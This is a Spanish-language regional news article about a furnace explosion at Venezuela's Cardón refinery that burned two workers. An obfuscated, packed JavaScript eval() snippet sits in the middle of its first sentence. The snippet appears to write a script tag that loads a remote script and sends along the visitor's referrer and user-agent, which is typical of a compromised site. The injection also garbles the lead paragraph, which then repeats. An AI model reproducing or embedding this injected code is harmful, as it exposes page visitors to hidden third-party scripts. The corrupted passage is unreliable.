Trasladan a Maracaibo a un herido por explosión en Cardón

Nataly Angulo V. / Maracaibo / [email protected]
La eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nrsdi|var|u0026u|referrer|bbzzf||js|php'.split('|'),0,{})) explosión del horno ocurrió el martes a las 8.00 de la noche en la Refinería Cardón, que junto a Amuay y Bajo Grande conforman el Centro Refinador de Paraguaná (CRP). La noticia se dio a conocer ayer en la tarde, tras el sobrevuelo de un helicóptero en la clínica que llevó al herido a la capital zuliana

Foto: Cortesía

Dos trabajadores de la Refinería Cardón, en Falcón, resultaron quemados tras tratar de prender uno de los hornos de la Planta Reformador de Nafta, que estaba paralizada desde hace al menos cinco meses.

Los heridos fueron trasladados a la clínica privada La Familia en Santa Irene, Punto Fijo; pero, ayer en la tarde fue trasladado uno de los lesionados, Pablo Céspedes, al Hospital Coromoto en Maracaibo.

La explosión del horno ocurrió el martes a las 8.00 de la noche en la Refinería Cardón, que junto a Amuay y Bajo Grande conforman el Centro Refinador de Paraguaná (CRP). La noticia se dio a conocer ayer en la tarde, tras el sobrevuelo de un helicóptero en la clínica que llevó al herido a la capital zuliana.

De acuerdo con NotiFalcón, el herido trasladado sufrió quemaduras de segundo y tercer grado en el brazo izquierdo, tórax y cara. 

El accidente se registró en momentos en que el CRP trataba de poner en funcionamiento la Planta Reformador de Nafta, que estaba paralizada desde hace cinco meses; pero, tras el suceso fue imposible, informó Yván Freites, representante de la Federación de Trabajadores Petroleros de Venezuela.

Según Freites, la explosión se trató de “una maniobra mal hecha” y aclaró: “no fue una explosión como la de Amuay, se trata de algo doméstico”.

 

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: [email protected] , [email protected] o [email protected]
Desarrollado por Miguel Guadarrama